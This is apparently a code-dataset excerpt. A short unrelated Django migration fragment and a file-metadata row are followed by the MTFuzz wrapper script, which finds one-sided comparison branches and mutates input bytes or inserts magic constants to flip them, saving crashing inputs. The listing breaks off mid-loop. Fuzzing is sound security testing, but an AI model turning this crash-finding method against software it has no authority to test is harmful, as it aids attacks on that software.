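        DataValue.objects.filter(fk_ent_id=duplicate.pk).update(fk_ent_id=target.pk)
        duplicate.delete()
# Example pairs taken from the migration above:
# _merge_entities(apps, {
#     'Mauritius, Including Agalega, Rodrigues and Saint Brandon.': 'Mauritius',
#     'United Republic of Tanzania, Including Zanzibar.': 'Tanzania',
# })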
| 63.269373 | 308 | 0.687216 | 2,257 | 17,146 | 5.13292 | 0.125388 | 0.14139 | 0.168494 | 0.207164 | 0.938714 | 0.918861 | 0.916789 | 0.911351 | 0.872335 | 0.795425 | 0 | 0.012248 | 0.199988 | 17,146 | 270 | 309 | 63.503704 | 0.832325 | 0.003849 | 0 | 0.353211 | 1 | 0.119266 | 0.456696 | 0.002284 | 0 | 0 | 0 | 0 | 0 | 1 | 0.004587 | false | 0.004587 | 0.009174 | 0 | 0.027523 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
3712e2790ede15914676759fb1acac7e00dc84c2 | 74,689 | py | Python | fuzzers/MTFuzz/mtfuzz-crack-off/mtfuzz_wrapper.py | PoShaung/program-smoothing-fuzzing | 60d1c2cd1ee460dcc6facdab92e96df7f44fdb3a | ["Apache-2.0"] | 1 | 2022-03-08T20:13:00.000Z | 2022-03-08T20:13:00.000Z | fuzzers/MTFuzz/mtfuzz-crack-off/mtfuzz_wrapper.py | PoShaung/program-smoothing-fuzzing | 60d1c2cd1ee460dcc6facdab92e96df7f44fdb3a | ["Apache-2.0"] | null | null | null | fuzzers/MTFuzz/mtfuzz-crack-off/mtfuzz_wrapper.py | PoShaung/program-smoothing-fuzzing | 60d1c2cd1ee460dcc6facdab92e96df7f44fdb3a | ["Apache-2.0"] | null | null | null |
import subprocess
import sys
import math
import shutil
import subprocess
import glob
# import ipdb
import pickle
import os
import numpy as np
import struct
import time
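# mtfuzz_wrapper: scans the seed corpus with afl-showbr to find CMP-based branches whose two
# outcomes have not both been exercised, then tries to "crack" each one by locating the input
# bytes that influence the comparison and overwriting them with byte sweeps or intercepted
# magic constants. Inputs that flip a branch are saved to ./seeds, crashing inputs to ./crashes.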
FNULL = open(os.devnull, 'w')
mut_cnt = 0
'''
def train(x, y):
model = Sequential()
model.add(Dense(8, input_dim=x.shape[1]))
#model.add(Dense(32, input_dim=x.shape[1]))
model.add(Dense(1))
opt = keras.optimizers.adam(lr=0.01)
model.compile(loss='mse', optimizer=opt)
save_best = keras.callbacks.ModelCheckpoint("best_w.h5", monitor='loss', verbose=0, save_best_only=True, save_weights_only=True, mode='min', period=1)
model.fit(x, y, epochs=50, batch_size=int(x.shape[0]/32), verbose=0, callbacks=[save_best])
model.load_weights("best_w.h5")
layer_list = [(layer.name, layer) for layer in model.layers]
loss = layer_list[-1][1].output[:, 0]
grads = K.gradients(loss, model.input)[0]
iterate = K.function([model.input], [loss, grads])
loss_value, grads_value = iterate([x[0:1]])
idx = np.flip(np.argsort(np.absolute(grads_value), axis=1)[:, -x.shape[1]:].reshape((x.shape[1],)), 0)[:1000]
return idx
'''
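# The triple-quoted block above is a disabled alternative for hot-byte identification: it trains
# a small Keras model on the byte-mutation samples and ranks input offsets by the gradient of
# the predicted value w.r.t. the input bytes, instead of the direct byte-sweep search used below.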
check_out = subprocess.check_output
# find unexplored branches
def find_unexplored_br(unexplored_1,unexplored_2, explored, seeds,tmp_argvv, argvv):
global mut_cnt
strcmp_cnt = 0
tmp_argvv[6] = argvv[6] + '_br'
for seed_id,seed in enumerate(seeds):
out = ''
try:
# TODO: add crash check for afl-showbr.
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '500'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '5000'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
print("### found a crash ")
shutil.copyfile(seed, "./crashes/id_0_0_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
continue
for line in out.splitlines():
tokens = line.split(b':')
if len(tokens) == 2:
edge = int(tokens[0])
hit = int(tokens[1])
if hit == 3:
if edge not in explored:
explored.append(edge)
if edge in unexplored_1:
del unexplored_1[edge]
if edge in unexplored_2:
del unexplored_2[edge]
elif hit == 1:
# if edge is explored before, skip it.
if edge in explored:
continue
# if edge is not in explored_1, add to unexplored_1/ append
if edge not in unexplored_1:
unexplored_1[edge] = [seed_id]
else:
unexplored_1[edge].append(seed_id)
# if edge is in explored_2, set it explored
if edge in unexplored_2:
del unexplored_2[edge]
del unexplored_1[edge]
explored.append(edge)
elif hit == 2:
# if edge is explored before, skip it.
if edge in explored:
continue
# if edge is not in explored_1, add to unexplored_1/ append
if edge not in unexplored_2:
unexplored_2[edge] = [seed_id]
else:
unexplored_2[edge].append(seed_id)
# if edge is in explored_2, set it explored
if edge in unexplored_1:
del unexplored_1[edge]
del unexplored_2[edge]
explored.append(edge)
if len(tokens) == 3:
edge = int(tokens[0])
hit = int(tokens[1])
lenn = int(tokens[2])
if hit == 3:
if edge not in explored:
explored.append(edge)
if edge in unexplored_1:
del unexplored_1[edge]
if edge in unexplored_2:
del unexplored_2[edge]
elif hit == 1:
# if edge is explored before, skip it.
if edge in explored:
continue
# if edge is not in explored_1, add to unexplored_1/ append
if edge not in unexplored_1:
unexplored_1[edge] = [(seed_id, lenn)]
else:
unexplored_1[edge].append((seed_id, lenn))
# if edge is in explored_2, set it explored
if edge in unexplored_2:
del unexplored_2[edge]
del unexplored_1[edge]
explored.append(edge)
elif hit == 2:
# if edge is explored before, skip it.
if edge in explored:
continue
# if edge is not in explored_1, add to unexplored_1/ append
if edge not in unexplored_2:
unexplored_2[edge] = [(seed_id, lenn)]
else:
unexplored_2[edge].append((seed_id, lenn))
# if edge is in explored_2, set it explored
if edge in unexplored_1:
del unexplored_1[edge]
del unexplored_2[edge]
explored.append(edge)
print(seed_id, len(unexplored_1) + len(unexplored_2), len(explored))
# set the seed with proper size at the head of list
for k,v in unexplored_1.items():
if not isinstance(v[0], tuple):
tmp_len = os.stat(seeds[v[0]]).st_size
for ele in v:
f_name = seeds[ele]
f_len = os.stat(f_name).st_size
if f_len > tmp_len:
v[0] = ele
else:
tmp_len = os.stat(seeds[v[0][0]]).st_size
for ele in v:
f_name = seeds[ele[0]]
f_len = os.stat(f_name).st_size
if f_len > tmp_len:
v[0] = ele
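# After find_unexplored_br() returns:
#   explored     - branch ids for which both outcomes have been observed (hit == 3, or hits 1
#                  and 2 seen across different seeds)
#   unexplored_1 - branch ids seen only with hit == 1, mapped to the seed indices (and operand
#                  lengths, when reported) that reach them
#   unexplored_2 - the same for branches seen only with hit == 2
# The loop directly above also moves a larger reaching seed to the front of each unexplored_1
# entry so that crack() starts from a suitably sized input.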
# for each unexplored CMP-based branch, mutate hot bytes with intercepted operands
# (TODO: clean up this function, it contains a lot of duplicated logic)
def crack(tmp_argvv, argvv):
magic_dict = {}
#possible_val = [1,3,7,15,31,63,127,255]
#possible_val = [3,12,48,192]
possible_val = [15, 240]
if os.path.isdir("./tmp_train/") == False:
os.makedirs('./tmp_train')
if os.path.isdir("./tmp_non_direct/") == False:
os.makedirs('./tmp_non_direct')
if os.path.exists('./br_log'):
magic_dict = pickle.load(open("br_log", 'rb'))
else:
br_log_name = argvv[6] + '_br_log'
with open(br_log_name, 'r') as f:
lines = f.read().splitlines()
for line in lines:
tokens = line.split(' ')
br_id = int(tokens[2])
br_type = int(tokens[4])
constant_loc = int(tokens[6])
constant_val = tokens[8]
lenn = int(tokens[10])
if br_id not in magic_dict:
magic_dict[br_id] = (br_type, constant_loc, constant_val, lenn)
pickle.dump(magic_dict, open('br_log', 'wb'))
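# magic_dict maps a branch id to the statically logged tuple (br_type, constant_loc,
# constant_val, lenn): the comparison kind, which operand is the constant (0 = no constant),
# the constant's value, and the operand length. It is cached in ./br_log for later runs.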
# read mut_cnt counter
global mut_cnt
with open("mut_cnt", 'r') as f:
mut_cnt = int(f.read())
# obtain unexplored branches
unexplored_1 = {}
unexplored_2 = {}
explored = []
seeds = glob.glob("seeds/*")
seeds.sort()
find_unexplored_br(unexplored_1, unexplored_2, explored, seeds,tmp_argvv, argvv)
if os.path.exists("crack_failed"):
crack_failed_but_I_tried = pickle.load(open("crack_failed","rb"))
else:
crack_failed_but_I_tried = []
# concatenate two dicts
unexplored_1.update(unexplored_2)
unexplored = unexplored_1
del unexplored[0]
#pickle.dump(unexplored, open('tmp_unexplored','wb'))
#unexplored = pickle.load(open('tmp_unexplored','rb'))
# k==br_id, v==seed_id
for k,v in unexplored.items():
if k in crack_failed_but_I_tried:
continue
crack_bool = False
# parse branch information from magic_dict (from static analysis LLVM)
(br_type, constant_loc, constant_magic, lenn) = magic_dict[k]
#if br_type != 2 and br_type != 7 and br_type != 11:
#if br_type != 10 and br_type != 12:# and br_type != 11:
# continue
if br_type == 0 or br_type == 1:
seed_id = v[0]
init_seed = bytearray(open(seeds[seed_id],'rb').read())
print("br id: " + str(k) + " br len: " + str(lenn) + " br type: " + str(br_type) + " magic: " + constant_magic + " magic_loc: " + str(constant_loc) + " file len: " + str(len(init_seed)))
# clean tmp dir
for f in glob.glob("./tmp_train/*"):
os.remove(f)
# create baseline file
with open("./tmp_train/"+str("121212"),'wb') as f:
f.write(init_seed)
# generate sample inputs
for i in range(len(init_seed)):
tmp_seed = init_seed.copy()
for val in possible_val:
tmp_seed[i] = val
with open("./tmp_train/"+str(i)+"_"+str(val),'wb') as f:
f.write(tmp_seed)
# parse variable values for each sample inputs
tmp_argvv[6] = argvv[6] + '_br_fast'
pro = subprocess.run(['./obtain_br','-i','tmp_train', '-o', './tmp_train', '-l', str(len(init_seed)), '-t', str(k)] + tmp_argvv[6:], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8", errors='ignore')
line = pro.stdout
lines = line[line.find('###$$$ obtain br')+18:].split('\n')[:-1]
tmp_dict = {}
# parse result
for line in lines:
tokens = line.split(':')
tokens2 = tokens[1].split(' ')
tmp_dict[tokens[0]] = [int(tokens2[0]), int(tokens2[1])]
if '121212' not in tmp_dict:
continue
init_op1 = tmp_dict['121212'][0]
init_op2 = tmp_dict['121212'][1]
init_distance = tmp_dict['121212'][0] - tmp_dict['121212'][1]
hot_offsets = []
min_dist = float('inf')
file_name = ''
# no magic constant case
if constant_loc == 0:
# parse hot bytes
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if ops[0] != init_op1 or ops[1] != init_op2:
# choose the optimal seed as starting point
if abs(distance) < min_dist:
min_dist = abs(distance)
file_name = offset
loc_offset = int(offset.split('_')[0])
if loc_offset not in hot_offsets:
hot_offsets.append(loc_offset)
if (distance > 0 and init_distance <= 0) or (distance <= 0 and init_distance > 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_train/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, skip to next branch
if crack_bool:
continue
# no hot byte candidates, skip
if len(hot_offsets)==0:
continue
# generate possible candidate inputs to crack the branch
init_seed = bytearray(open('./tmp_train/'+file_name,'rb').read())
for f in glob.glob("./tmp_non_direct/*"):
os.remove(f)
for hot_offset in hot_offsets[:64]:
tmp_seed = init_seed.copy()
for val in range(255):
tmp_seed[hot_offset] = val
with open("./tmp_non_direct/"+str(hot_offset)+"_"+str(val),'wb') as f:
f.write(tmp_seed)
# check results using faster mode binary
tmp_argvv[6] = argvv[6] + '_br_fast'
pro = subprocess.run(['./obtain_br','-i','tmp_non_direct', '-o', './tmp_non_direct', '-l', str(len(init_seed)), '-t', str(k)] + tmp_argvv[6:], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8",errors='ignore')
line = pro.stdout
lines = line[line.find('###$$$ obtain br')+18:].split('\n')[:-1]
tmp_dict = {}
# parse result
for line in lines:
tokens = line.split(':')
tokens2 = tokens[1].split(' ')
tmp_dict[tokens[0]] = [int(tokens2[0]), int(tokens2[1])]
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if (distance > 0 and init_distance <= 0) or (distance <= 0 and init_distance > 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_non_direct/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# magic constant case
else:
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if distance != init_distance:
loc_offset = int(offset.split('_')[0])
if loc_offset not in hot_offsets:
hot_offsets.append(loc_offset)
if (distance > 0 and init_distance <= 0) or (distance <= 0 and init_distance > 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_train/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, skip to next branch
if crack_bool:
continue
# no hot byte candidates, skip
if len(hot_offsets)==0:
continue
if init_distance > 0:
# construct an equal case to satisfy <= case
magic_ori = struct.pack("@Q", int(constant_magic))
else:
# construct a > case to satisfy the > case
if constant_loc == 2:
magic_ori = struct.pack("@Q", int(constant_magic)+1)
elif constant_loc == 1:
if int(constant_magic) == 0:
continue
magic_ori = struct.pack("@Q", int(constant_magic)-1)
else:
print("error")
sys.exit(0)
# llvm operand size
magic_l = [magic_ori[:l] for l in [1,2,4,8]]
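# struct.pack("@Q", n) encodes the constant as an 8-byte unsigned integer in native byte order;
# slicing it to 1, 2, 4 and 8 bytes produces candidates for the common LLVM operand widths.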
# write magic bytes to input and check branch coverage
for hot_offset in hot_offsets:
for magic in magic_l:
tmp_seed = init_seed.copy()
tmp_seed[hot_offset:hot_offset+len(magic)] = magic
with open("tmp_input",'wb') as f:
f.write(tmp_seed)
tmp_argvv[6] = argvv[6] + '_br'
out = ''
seed = './tmp_input'
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '500'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '5000'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
print("### found a crash " + str(k) + " br_tyte "+ str(br_type))
shutil.copyfile("tmp_input", "./crashes/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
for line in out.splitlines():
tokens = line.split(b':')
edge = int(tokens[0])
hit = int(tokens[1])
if edge == k:
if (init_distance > 0 and hit == 2) or (init_distance <= 0 and hit == 1):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("tmp_input", "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, early exit
if crack_bool:
break
if (hot_offset+1) >= len(magic):
tmp_seed = init_seed.copy()
tmp_seed[hot_offset-len(magic)+1 :hot_offset+1] = magic
with open("tmp_input",'wb') as f:
f.write(tmp_seed)
tmp_argvv[6] = argvv[6] + '_br'
out = ''
seed = './tmp_input'
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '500'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '5000'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
print("### found a crash " + str(k) + " br_tyte "+ str(br_type))
shutil.copyfile("tmp_input", "./crashes/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
for line in out.splitlines():
tokens = line.split(b':')
edge = int(tokens[0])
hit = int(tokens[1])
if edge == k:
if (init_distance > 0 and hit == 2) or (init_distance <= 0 and hit == 1):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("tmp_input", "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, early exit
if crack_bool:
break
# crack early exit
if crack_bool:
break
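# The br_type blocks that follow (2/7/11, 3/4, 5/6, 8/9) repeat the same crack flow as above;
# only the distance predicate and the direction of the constant adjustment change to match the
# comparison kind, so the hot-byte search and magic-byte overwrite logic is duplicated verbatim.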
if br_type == 2 or br_type == 7 or br_type == 11:
t0 = time.time()
seed_id = v[0]
init_seed = bytearray(open(seeds[seed_id],'rb').read())
print("br id: " + str(k) + " br len: " + str(lenn) + " br type: " + str(br_type) + " magic: " + constant_magic + " magic_loc: " + str(constant_loc) + " file len: " + str(len(init_seed)))
# clean tmp dir
for f in glob.glob("./tmp_train/*"):
os.remove(f)
# create baseline file
with open("./tmp_train/"+str("121212"),'wb') as f:
f.write(init_seed)
# generate sample inputs
for i in range(len(init_seed)):
tmp_seed = init_seed.copy()
for val in possible_val:
tmp_seed[i] = val
with open("./tmp_train/"+str(i)+"_"+str(val),'wb') as f:
f.write(tmp_seed)
# parse variable values for each sample inputs
tmp_argvv[6] = argvv[6] + '_br_fast'
pro = subprocess.run(['./obtain_br','-i','tmp_train', '-o', './tmp_train', '-l', str(len(init_seed)), '-t', str(k)] + tmp_argvv[6:], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8", errors='ignore')
t1 = time.time()
print("obtain_br time cost " + str(t1-t0))
line = pro.stdout
lines = line[line.find('###$$$ obtain br')+18:].split('\n')[:-1]
tmp_dict = {}
# parse result
for line in lines:
tokens = line.split(':')
tokens2 = tokens[1].split(' ')
tmp_dict[tokens[0]] = [int(tokens2[0]), int(tokens2[1])]
t2 = time.time()
print("parse obtain_br result time cost " + str(t2-t1))
if '121212' not in tmp_dict:
continue
init_op1 = tmp_dict['121212'][0]
init_op2 = tmp_dict['121212'][1]
init_distance = tmp_dict['121212'][0] - tmp_dict['121212'][1]
hot_offsets = []
min_dist = float('inf')
file_name = ''
# no magic constant case
if constant_loc == 0:
# parse hot bytes
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if ops[0] != init_op1 or ops[1] != init_op2:
# choose the optimal seed as starting point
if abs(distance) < min_dist:
min_dist = abs(distance)
file_name = offset
loc_offset = int(offset.split('_')[0])
if loc_offset not in hot_offsets:
hot_offsets.append(loc_offset)
if (distance == 0 and init_distance != 0) or (distance != 0 and init_distance == 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_train/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, skip to next branch
if crack_bool:
continue
# no hot byte candidates, skip
if len(hot_offsets)==0:
continue
# generate possible candidate inputs to crack the branch
init_seed = bytearray(open('./tmp_train/'+file_name,'rb').read())
for f in glob.glob("./tmp_non_direct/*"):
os.remove(f)
for hot_offset in hot_offsets[:64]:
tmp_seed = init_seed.copy()
for val in range(255):
tmp_seed[hot_offset] = val
with open("./tmp_non_direct/"+str(hot_offset)+"_"+str(val),'wb') as f:
f.write(tmp_seed)
# check results using faster mode binary
tmp_argvv[6] = argvv[6] + '_br_fast'
pro = subprocess.run(['./obtain_br','-i','tmp_non_direct', '-o', './tmp_non_direct', '-l', str(len(init_seed)), '-t', str(k)] + tmp_argvv[6:], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8",errors='ignore')
line = pro.stdout
lines = line[line.find('###$$$ obtain br')+18:].split('\n')[:-1]
tmp_dict = {}
# parse result
for line in lines:
tokens = line.split(':')
tokens2 = tokens[1].split(' ')
tmp_dict[tokens[0]] = [int(tokens2[0]), int(tokens2[1])]
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if (distance == 0 and init_distance != 0) or (distance != 0 and init_distance == 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_non_direct/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# magic constant case
else:
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if distance != init_distance:
loc_offset = int(offset.split('_')[0])
if loc_offset not in hot_offsets:
hot_offsets.append(loc_offset)
if (distance == 0 and init_distance != 0) or (distance != 0 and init_distance == 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_train/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
t3 = time.time()
print("parse distance result time cost " + str(t3-t2))
# crack success, skip to next branch
if crack_bool:
continue
# no hot byte candidates, skip
if len(hot_offsets)==0:
continue
if init_distance != 0:
# construct an equal case to satisfy == case
magic_ori = struct.pack("@Q", int(constant_magic))
else:
# construct an inequality case to satisfy the != case
magic_ori = struct.pack("@Q", int(constant_magic)+1)
# llvm operand size
magic_l = [magic_ori[:l] for l in [1,2,4,8]]
# write magic bytes to input and check branch coverage
for hot_offset in hot_offsets:
for magic in magic_l:
tmp_seed = init_seed.copy()
tmp_seed[hot_offset:hot_offset+len(magic)] = magic
with open("tmp_input",'wb') as f:
f.write(tmp_seed)
tmp_argvv[6] = argvv[6] + '_br'
out = ''
seed = './tmp_input'
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '500'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '5000'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
print("### found a crash " + str(k) + " br_tyte "+ str(br_type))
shutil.copyfile("tmp_input", "./crashes/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
for line in out.splitlines():
tokens = line.split(b':')
edge = int(tokens[0])
hit = int(tokens[1])
if edge == k:
if (init_distance == 0 and hit == 2) or (init_distance != 0 and hit == 1):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("tmp_input", "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, early exit
if crack_bool:
break
if (hot_offset+1) >= len(magic):
tmp_seed = init_seed.copy()
tmp_seed[hot_offset-len(magic)+1 :hot_offset+1] = magic
with open("tmp_input",'wb') as f:
f.write(tmp_seed)
tmp_argvv[6] = argvv[6] + '_br'
out = ''
seed = './tmp_input'
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '500'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '5000'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
print("### found a crash " + str(k) + " br_tyte "+ str(br_type))
shutil.copyfile("tmp_input", "./crashes/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
for line in out.splitlines():
tokens = line.split(b':')
edge = int(tokens[0])
hit = int(tokens[1])
if edge == k:
if (init_distance == 0 and hit == 2) or (init_distance != 0 and hit == 1):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("tmp_input", "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, early exit
if crack_bool:
break
# crack early exit
if crack_bool:
break
t4 = time.time()
print("crack time cost " + str(t4-t3))
#'''
if br_type == 3 or br_type == 4:
seed_id = v[0]
init_seed = bytearray(open(seeds[seed_id],'rb').read())
print("br id: " + str(k) + " br len: " + str(lenn) + " br type: " + str(br_type) + " magic: " + constant_magic + " magic_loc: " + str(constant_loc) + " file len: " + str(len(init_seed)))
# clean tmp dir
for f in glob.glob("./tmp_train/*"):
os.remove(f)
# create baseline file
with open("./tmp_train/"+str("121212"),'wb') as f:
f.write(init_seed)
# generate sample inputs
for i in range(len(init_seed)):
tmp_seed = init_seed.copy()
for val in possible_val:
tmp_seed[i] = val
with open("./tmp_train/"+str(i)+"_"+str(val),'wb') as f:
f.write(tmp_seed)
# parse variable values for each sample inputs
tmp_argvv[6] = argvv[6] + '_br_fast'
pro = subprocess.run(['./obtain_br','-i','tmp_train', '-o', './tmp_train', '-l', str(len(init_seed)), '-t', str(k)] + tmp_argvv[6:], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8", errors='ignore')
line = pro.stdout
lines = line[line.find('###$$$ obtain br')+18:].split('\n')[:-1]
tmp_dict = {}
# parse result
for line in lines:
tokens = line.split(':')
tokens2 = tokens[1].split(' ')
tmp_dict[tokens[0]] = [int(tokens2[0]), int(tokens2[1])]
if '121212' not in tmp_dict:
continue
init_op1 = tmp_dict['121212'][0]
init_op2 = tmp_dict['121212'][1]
init_distance = tmp_dict['121212'][0] - tmp_dict['121212'][1]
hot_offsets = []
min_dist = float('inf')
file_name = ''
# no magic constant case
if constant_loc == 0:
# parse hot bytes
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if ops[0] != init_op1 or ops[1] != init_op2:
# choose the optimal seed as starting point
if abs(distance) < min_dist:
min_dist = abs(distance)
file_name = offset
loc_offset = int(offset.split('_')[0])
if loc_offset not in hot_offsets:
hot_offsets.append(loc_offset)
if (distance >= 0 and init_distance < 0) or (distance < 0 and init_distance >= 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_train/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, skip to next branch
if crack_bool:
continue
# no hot byte candidates, skip
if len(hot_offsets)==0:
continue
# generate possible candidate inputs to crack the branch
init_seed = bytearray(open('./tmp_train/'+file_name,'rb').read())
for f in glob.glob("./tmp_non_direct/*"):
os.remove(f)
for hot_offset in hot_offsets[:64]:
tmp_seed = init_seed.copy()
for val in range(255):
tmp_seed[hot_offset] = val
with open("./tmp_non_direct/"+str(hot_offset)+"_"+str(val),'wb') as f:
f.write(tmp_seed)
# check results using faster mode binary
tmp_argvv[6] = argvv[6] + '_br_fast'
pro = subprocess.run(['./obtain_br','-i','tmp_non_direct', '-o', './tmp_non_direct', '-l', str(len(init_seed)), '-t', str(k)] + tmp_argvv[6:], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8",errors='ignore')
line = pro.stdout
lines = line[line.find('###$$$ obtain br')+18:].split('\n')[:-1]
tmp_dict = {}
# parse result
for line in lines:
tokens = line.split(':')
tokens2 = tokens[1].split(' ')
tmp_dict[tokens[0]] = [int(tokens2[0]), int(tokens2[1])]
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if (distance >= 0 and init_distance < 0) or (distance < 0 and init_distance >= 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_non_direct/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# magic constant case
else:
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if distance != init_distance:
loc_offset = int(offset.split('_')[0])
if loc_offset not in hot_offsets:
hot_offsets.append(loc_offset)
if (distance >= 0 and init_distance < 0) or (distance < 0 and init_distance >= 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_train/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, skip to next branch
if crack_bool:
continue
# no hot byte candidates, skip
if len(hot_offsets)==0:
continue
if init_distance < 0:
# construct an equal case to satisfy the >= case
magic_ori = struct.pack("@Q", int(constant_magic))
else:
# construct a < case to satisfy the < case
if constant_loc == 2:
if int(constant_magic) == 0:
continue
magic_ori = struct.pack("@Q", int(constant_magic)-1)
elif constant_loc == 1:
magic_ori = struct.pack("@Q", int(constant_magic)+1)
else:
print("error")
sys.exit(0)
# llvm operand size
magic_l = [magic_ori[:l] for l in [1,2,4,8]]
# write magic bytes to input and check branch coverage
for hot_offset in hot_offsets:
for magic in magic_l:
tmp_seed = init_seed.copy()
tmp_seed[hot_offset:hot_offset+len(magic)] = magic
with open("tmp_input",'wb') as f:
f.write(tmp_seed)
tmp_argvv[6] = argvv[6] + '_br'
out = ''
seed = './tmp_input'
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '500'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '5000'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
print("### found a crash " + str(k) + " br_tyte "+ str(br_type))
shutil.copyfile("tmp_input", "./crashes/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
for line in out.splitlines():
tokens = line.split(b':')
edge = int(tokens[0])
hit = int(tokens[1])
if edge == k:
